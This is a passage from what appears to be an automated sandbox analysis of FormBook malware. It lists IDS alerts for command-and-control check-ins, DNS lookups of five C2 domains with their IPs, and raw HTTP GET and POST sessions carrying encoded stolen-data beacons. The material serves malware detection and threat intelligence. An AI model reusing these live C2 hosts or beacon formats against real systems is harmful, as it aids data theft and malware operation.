RT_ICON       | 0xf2100 | 0x2227 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                            |          |         | 0.9723207137138282
RT_GROUP_ICON | 0xf4338 | 0x14   | data                                                                                   |          |         | 1.05
RT_VERSION    | 0xf435c | 0x3a0  | data                                                                                   |          |         | 0.41810344827586204
RT_MANIFEST   | 0xf470c | 0x1ea  | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators      |          |         | 0.5489795918367347
DLL         | Import
mscoree.dll | _CorExeMain
Timestamp                        | SID     | Signature                                   | Severity | Source IP   | Source Port | Dest IP        | Dest Port | Protocol
2024-11-27T16:43:19.387146+0100  | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5    | 1        | 192.168.2.4 | 49743       | 15.197.142.173 | 80        | TCP
2024-11-27T16:43:19.387146+0100  | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1        | 192.168.2.4 | 49743       | 15.197.142.173 | 80        | TCP
2024-11-27T16:43:36.752491+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49768       | 38.6.78.235    | 80        | TCP
2024-11-27T16:43:39.370503+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49775       | 38.6.78.235    | 80        | TCP
2024-11-27T16:43:42.095834+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49781       | 38.6.78.235    | 80        | TCP
2024-11-27T16:43:44.696864+0100  | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5    | 1        | 192.168.2.4 | 49787       | 38.6.78.235    | 80        | TCP
2024-11-27T16:43:44.696864+0100  | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1        | 192.168.2.4 | 49787       | 38.6.78.235    | 80        | TCP
2024-11-27T16:43:51.963011+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49803       | 139.162.181.76 | 80        | TCP
2024-11-27T16:43:54.656200+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49810       | 139.162.181.76 | 80        | TCP
2024-11-27T16:43:57.614795+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49817       | 139.162.181.76 | 80        | TCP
2024-11-27T16:44:00.225216+0100  | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5    | 1        | 192.168.2.4 | 49826       | 139.162.181.76 | 80        | TCP
2024-11-27T16:44:00.225216+0100  | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1        | 192.168.2.4 | 49826       | 139.162.181.76 | 80        | TCP
2024-11-27T16:44:07.849372+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49841       | 154.23.176.197 | 80        | TCP
2024-11-27T16:44:10.536744+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49847       | 154.23.176.197 | 80        | TCP
2024-11-27T16:44:13.209788+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49853       | 154.23.176.197 | 80        | TCP
2024-11-27T16:44:16.039080+0100  | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5    | 1        | 192.168.2.4 | 49860       | 154.23.176.197 | 80        | TCP
2024-11-27T16:44:16.039080+0100  | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1        | 192.168.2.4 | 49860       | 154.23.176.197 | 80        | TCP
2024-11-27T16:44:23.316350+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49878       | 194.58.112.174 | 80        | TCP
2024-11-27T16:44:25.958240+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49884       | 194.58.112.174 | 80        | TCP
2024-11-27T16:44:28.724138+0100  | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1       | 192.168.2.4 | 49891       | 194.58.112.174 | 80        | TCP
2024-11-27T16:44:31.286011+0100  | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5    | 1        | 192.168.2.4 | 49898       | 194.58.112.174 | 80        | TCP
2024-11-27T16:44:31.286011+0100  | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1        | 192.168.2.4 | 49898       | 194.58.112.174 | 80        | TCP
                                                                                                            Nov 27, 2024 16:44:16.039156914 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.039302111 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039330006 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039341927 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.039341927 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.039380074 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.159933090 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.159967899 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.160089016 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.163788080 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.163830042 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.163896084 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.267220974 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.267340899 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.267462969 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.272604942 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.273983002 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.274029016 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.274046898 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.278599024 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.278659105 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.278686047 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.285677910 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:16.285784960 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.288695097 CET4986080192.168.2.4154.23.176.197
                                                                                                            Nov 27, 2024 16:44:16.408736944 CET8049860154.23.176.197192.168.2.4
                                                                                                            Nov 27, 2024 16:44:21.789155006 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:21.909564972 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:21.909666061 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:21.925726891 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:22.046521902 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:23.316205025 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:23.316293001 CET8049878194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:23.316349983 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:23.427500963 CET4987880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.448442936 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.570327044 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:24.570410967 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.587764978 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:24.709201097 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:25.958144903 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:25.958183050 CET8049884194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:25.958240032 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:26.099571943 CET4988480192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.121491909 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.243498087 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.243582964 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.263787031 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:27.383924961 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.383955956 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.383965969 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384046078 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384053946 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384172916 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384200096 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384244919 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:27.384254932 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:28.671099901 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:28.724138021 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:28.771012068 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:28.798119068 CET8049891194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:28.798180103 CET4989180192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:29.790108919 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:29.910196066 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:29.910340071 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:29.924264908 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:30.044363022 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:31.285835981 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:31.285865068 CET8049898194.58.112.174192.168.2.4
                                                                                                            Nov 27, 2024 16:44:31.286010981 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:31.288933992 CET4989880192.168.2.4194.58.112.174
                                                                                                            Nov 27, 2024 16:44:31.408817053 CET8049898194.58.112.174192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 27, 2024 16:43:17.612473965 CET | 53191 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 16:43:18.099901915 CET | 53 | 53191 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 16:43:34.432089090 CET | 63639 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 16:43:35.253838062 CET | 53 | 63639 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 16:43:49.712816000 CET | 49862 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 16:43:50.443731070 CET | 53 | 49862 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 16:44:05.243964911 CET | 62398 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 16:44:06.203043938 CET | 53 | 62398 | 1.1.1.1 | 192.168.2.4
Nov 27, 2024 16:44:21.306240082 CET | 62258 | 53 | 192.168.2.4 | 1.1.1.1
Nov 27, 2024 16:44:21.781784058 CET | 53 | 62258 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 27, 2024 16:43:17.612473965 CET | 192.168.2.4 | 1.1.1.1 | 0x91b7 | Standard query (0) | www.dojodigitize.shop | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:43:34.432089090 CET | 192.168.2.4 | 1.1.1.1 | 0xa5f1 | Standard query (0) | www.17jkgl.com | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:43:49.712816000 CET | 192.168.2.4 | 1.1.1.1 | 0xbda1 | Standard query (0) | www.alvinsd.buzz | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:44:05.243964911 CET | 192.168.2.4 | 1.1.1.1 | 0x528f | Standard query (0) | www.shipincheshi.today | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:44:21.306240082 CET | 192.168.2.4 | 1.1.1.1 | 0x4082 | Standard query (0) | www.elinor.club | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 27, 2024 16:43:18.099901915 CET | 1.1.1.1 | 192.168.2.4 | 0x91b7 | No error (0) | www.dojodigitize.shop | dojodigitize.shop | | CNAME (Canonical name) | IN (0x0001) | false
Nov 27, 2024 16:43:18.099901915 CET | 1.1.1.1 | 192.168.2.4 | 0x91b7 | No error (0) | dojodigitize.shop | | 15.197.142.173 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:43:18.099901915 CET | 1.1.1.1 | 192.168.2.4 | 0x91b7 | No error (0) | dojodigitize.shop | | 3.33.152.147 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:43:35.253838062 CET | 1.1.1.1 | 192.168.2.4 | 0xa5f1 | No error (0) | www.17jkgl.com | | 38.6.78.235 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:43:50.443731070 CET | 1.1.1.1 | 192.168.2.4 | 0xbda1 | No error (0) | www.alvinsd.buzz | | 139.162.181.76 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:43:50.443731070 CET | 1.1.1.1 | 192.168.2.4 | 0xbda1 | No error (0) | www.alvinsd.buzz | | 172.104.149.86 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:44:06.203043938 CET | 1.1.1.1 | 192.168.2.4 | 0x528f | No error (0) | www.shipincheshi.today | | 154.23.176.197 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:44:06.203043938 CET | 1.1.1.1 | 192.168.2.4 | 0x528f | No error (0) | www.shipincheshi.today | | 154.23.176.232 | A (IP address) | IN (0x0001) | false
Nov 27, 2024 16:44:21.781784058 CET | 1.1.1.1 | 192.168.2.4 | 0x4082 | No error (0) | www.elinor.club | | 194.58.112.174 | A (IP address) | IN (0x0001) | false
• www.dojodigitize.shop
• www.17jkgl.com
• www.alvinsd.buzz
• www.shipincheshi.today
• www.elinor.club
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49743 | 15.197.142.173 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:43:18.238176107 CET | 466 | OUT | GET /3acc/?LRW=skYxN//30ryIi85Wi0QpETYUbcdPFuXI+97QewxhrY3NM2hqn6Sq2BPHPiKxfL80eN+v/gcRWuFAYeqrMVkPGGlMHJiH0BFPFC9u+m//81WV26UqMu5nMks=&fvqp6=9vfXK HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.dojodigitize.shop
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Nov 27, 2024 16:43:19.386939049 CET | 133 | IN | HTTP/1.1 404 Not Found
Server: awselb/2.0
Date: Wed, 27 Nov 2024 15:43:19 GMT
Content-Length: 0
Connection: close
WAFRule: 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49768 | 38.6.78.235 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe

Timestamp | Bytes transferred | Direction | Data
Nov 27, 2024 16:43:35.393528938 CET | 719 | OUT | POST /yjgs/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Host: www.17jkgl.com
Origin: http://www.17jkgl.com
Referer: http://www.17jkgl.com/yjgs/
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Content-Length: 200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 49 74 6d 45 6d 70 34 70 6c 50 59 7a 54 5a 4e 54 45 74 47 44 4e 68 4d 54 53 78 57 4e 6f 77 30 41 39 37 56 41 37 30 33 52 32 33 35 56 46 2b 48 4c 59 64 4c 54 6e 79 75 6c 77 71 67 33 73 53 74 42 5a 52 34 34 4e 41 44 70 79 4e 2f 4e 4b 36 50 54 7a 54 52 51 53 52 70 67 67 30 6f 4d 65 61 6e 65 51 79 38 56 36 79 36 39 6e 75 70 4b 45 34 64 6b 53 77 49 43 50 4f 72 71 65 34 34 4f 42 54 31 51 77 38 4a 4b 48 4c 6e 7a 54 75 54 53 47 4f 58 48 49 7a 2b 51 76 44 75 55 58 75 33 6e 41 51 51 6b 55 65 34 70 58 38 54 78 78 6e 51 42 4d 6a 6d 49 79 6f 34 5a 34 67 3d 3d
Data Ascii: LRW=0NNFlb2Eb+w7ItmEmp4plPYzTZNTEtGDNhMTSxWNow0A97VA703R235VF+HLYdLTnyulwqg3sStBZR44NADpyN/NK6PTzTRQSRpgg0oMeaneQy8V6y69nupKE4dkSwICPOrqe44OBT1Qw8JKHLnzTuTSGOXHIz+QvDuUXu3nAQQkUe4pX8TxxnQBMjmIyo4Z4g==
Nov 27, 2024 16:43:36.752314091 CET | 262 | IN | HTTP/1.1 400 Bad Request
Date: Wed, 27 Nov 2024 15:43:36 GMT
Server: Apache
Upgrade: h2
Connection: Upgrade, close
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 33
Content-Type: text/html; charset=utf-8
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
Data Ascii: 310Q/Qp/KT\


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            2192.168.2.44977538.6.78.235805608C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Nov 27, 2024 16:43:38.051320076 CET739OUTPOST /yjgs/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.17jkgl.com
                                                                                                            Origin: http://www.17jkgl.com
                                                                                                            Referer: http://www.17jkgl.com/yjgs/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 220
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 4a 4d 57 45 6c 49 34 70 79 66 59 79 4f 70 4e 54 57 74 48 4b 4e 67 77 54 53 77 53 6e 6f 46 63 41 34 72 6c 41 38 31 33 52 33 33 35 56 50 65 48 4f 46 4e 4c 61 6e 79 6a 61 77 71 4d 33 73 53 70 42 5a 51 49 34 4f 78 44 75 79 64 2f 54 4c 4b 50 52 39 7a 52 51 53 52 70 67 67 30 39 72 65 5a 58 65 51 43 4d 56 37 54 36 79 38 4f 70 4c 4e 59 64 6b 41 41 49 47 50 4f 71 48 65 35 6b 6b 42 56 78 51 77 35 74 4b 4a 2f 4b 42 4a 2b 54 55 62 2b 57 57 5a 54 44 36 33 44 62 6a 61 4e 71 47 64 42 38 2b 56 59 31 7a 47 4e 79 6d 6a 6e 30 79 52 6b 76 38 2f 72 46 51 6a 6c 78 6c 7a 4b 49 68 2b 74 6a 45 6d 37 78 73 39 67 61 70 76 34 77 3d
                                                                                                            Data Ascii: LRW=0NNFlb2Eb+w7JMWElI4pyfYyOpNTWtHKNgwTSwSnoFcA4rlA813R335VPeHOFNLanyjawqM3sSpBZQI4OxDuyd/TLKPR9zRQSRpgg09reZXeQCMV7T6y8OpLNYdkAAIGPOqHe5kkBVxQw5tKJ/KBJ+TUb+WWZTD63DbjaNqGdB8+VY1zGNymjn0yRkv8/rFQjlxlzKIh+tjEm7xs9gapv4w=
                                                                                                             Nov 27, 2024 16:43:39.370203018 CET | 262 | IN | HTTP/1.1 400 Bad Request
                                                                                                            Date: Wed, 27 Nov 2024 15:43:39 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Content-Encoding: gzip
                                                                                                            Content-Length: 33
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                                            Data Ascii: 310Q/Qp/KT\


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             3 | 192.168.2.4 | 49781 | 38.6.78.235 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 27, 2024 16:43:40.707643032 CET | 10821 | OUT | POST /yjgs/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.17jkgl.com
                                                                                                            Origin: http://www.17jkgl.com
                                                                                                            Referer: http://www.17jkgl.com/yjgs/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 10300
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 30 4e 4e 46 6c 62 32 45 62 2b 77 37 4a 4d 57 45 6c 49 34 70 79 66 59 79 4f 70 4e 54 57 74 48 4b 4e 67 77 54 53 77 53 6e 6f 44 45 41 34 34 64 41 38 57 66 52 6c 6e 35 56 4d 65 48 50 46 4e 4b 49 6e 79 72 65 77 71 51 42 73 52 42 42 59 7a 51 34 50 44 72 75 38 64 2f 54 4f 36 50 63 7a 54 52 46 53 58 4a 73 67 30 74 72 65 5a 58 65 51 42 55 56 38 43 36 79 37 2b 70 4b 45 34 64 6f 53 77 49 2b 50 4b 48 79 65 35 51 65 42 46 52 51 78 5a 64 4b 4c 4d 79 42 52 75 54 57 59 2b 57 4f 5a 54 50 68 33 44 48 56 61 4f 33 54 64 43 67 2b 55 66 6b 52 5a 4a 79 4c 2f 48 38 76 4c 54 66 76 33 36 70 31 71 6c 4d 59 79 70 42 34 69 38 44 59 73 38 4d 58 6c 53 69 45 32 2b 4e 65 6d 48 78 62 51 4e 77 70 47 79 54 41 68 64 47 7a 72 53 4c 79 77 76 39 77 4a 51 4c 38 48 48 32 31 35 38 41 6c 30 6c 6f 78 47 78 35 72 79 54 4f 78 2b 44 72 4d 6f 51 64 67 64 68 34 47 6b 38 66 78 33 37 30 4a 4b 75 34 6d 46 47 66 37 43 78 46 38 41 32 30 5a 6a 75 37 61 31 41 43 44 66 62 4a 41 54 61 31 44 50 57 6e 35 30 4b 38 59 58 54 36 6c 6a 76 30 4e 4d 39 [TRUNCATED]
                                                                                                             Data Ascii: LRW=... [TRUNCATED]
                                                                                                             Nov 27, 2024 16:43:42.095628977 CET | 262 | IN | HTTP/1.1 400 Bad Request
                                                                                                            Date: Wed, 27 Nov 2024 15:43:41 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Vary: Accept-Encoding
                                                                                                            Content-Encoding: gzip
                                                                                                            Content-Length: 33
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Data Raw: 1f 8b 08 00 00 00 00 00 00 03 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b 01 00 92 54 0e 5c 0d 00 00 00
                                                                                                            Data Ascii: 310Q/Qp/KT\


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             4 | 192.168.2.4 | 49787 | 38.6.78.235 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 27, 2024 16:43:43.359163046 CET | 459 | OUT | GET /yjgs/?LRW=5PllmvK0caJhA9qO+og5+P8kc5JWR+uQLy91XhuloCAo6K0czluNggt7J8fRT5aF3DbStYNhlgg+eys4IUnD8eH0N6/eozV0E04Jm3Q8YYXSei9vmTSoi+w=&fvqp6=9vfXK HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Host: www.17jkgl.com
                                                                                                            Connection: close
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                             Nov 27, 2024 16:43:44.696460009 CET | 189 | IN | HTTP/1.1 503 Service Unavailable
                                                                                                            Date: Wed, 27 Nov 2024 15:43:44 GMT
                                                                                                            Server: Apache
                                                                                                            Upgrade: h2
                                                                                                            Connection: Upgrade, close
                                                                                                            Content-Length: 0
                                                                                                            Content-Type: text/html; charset=utf-8


                                                                                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                             5 | 192.168.2.4 | 49803 | 139.162.181.76 | 80 | 5608 | C:\Program Files (x86)\skDfaPcTfXAvFAZvvHpKDPPssrYjGChYpVtEQtnJpecV\nhClcdOjQwJ.exe
                                                                                                             Timestamp | Bytes transferred | Direction | Data
                                                                                                             Nov 27, 2024 16:43:50.644484043 CET | 725 | OUT | POST /d43q/ HTTP/1.1
                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                            Accept-Language: en-US,en;q=0.5
                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                            Host: www.alvinsd.buzz
                                                                                                            Origin: http://www.alvinsd.buzz
                                                                                                            Referer: http://www.alvinsd.buzz/d43q/
                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                            Connection: close
                                                                                                            Cache-Control: no-cache
                                                                                                            Content-Length: 200
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/45.0.2412.0 Safari/537.1
                                                                                                            Data Raw: 4c 52 57 3d 6e 4d 61 64 63 5a 31 78 70 6c 2f 72 70 70 59 79 4e 68 57 41 59 58 77 4c 5a 51 66 76 70 52 47 2f 4d 6e 6c 54 73 69 39 53 71 4c 70 35 77 4f 30 54 50 37 35 69 36 72 4b 32 7a 4a 55 58 62 71 39 51 32 6a 74 47 4e 31 33 68 38 78 31 32 49 65 53 52 41 36 45 6d 37 55 79 47 31 68 53 6a 46 36 54 57 43 61 66 79 54 48 61 50 63 66 53 53 7a 74 41 50 63 72 72 70 31 41 59 71 72 34 4c 63 43 41 58 61 4f 77 70 5a 6f 56 72 62 73 58 77 30 47 4c 42 41 36 6b 69 68 43 4d 36 33 47 57 4f 44 43 77 75 69 39 78 71 63 6c 48 72 51 34 70 4e 61 52 6e 45 66 41 54 75 51 5a 6d 53 6d 61 36 6d 6b 2b 44 51 31 66 77 3d 3d
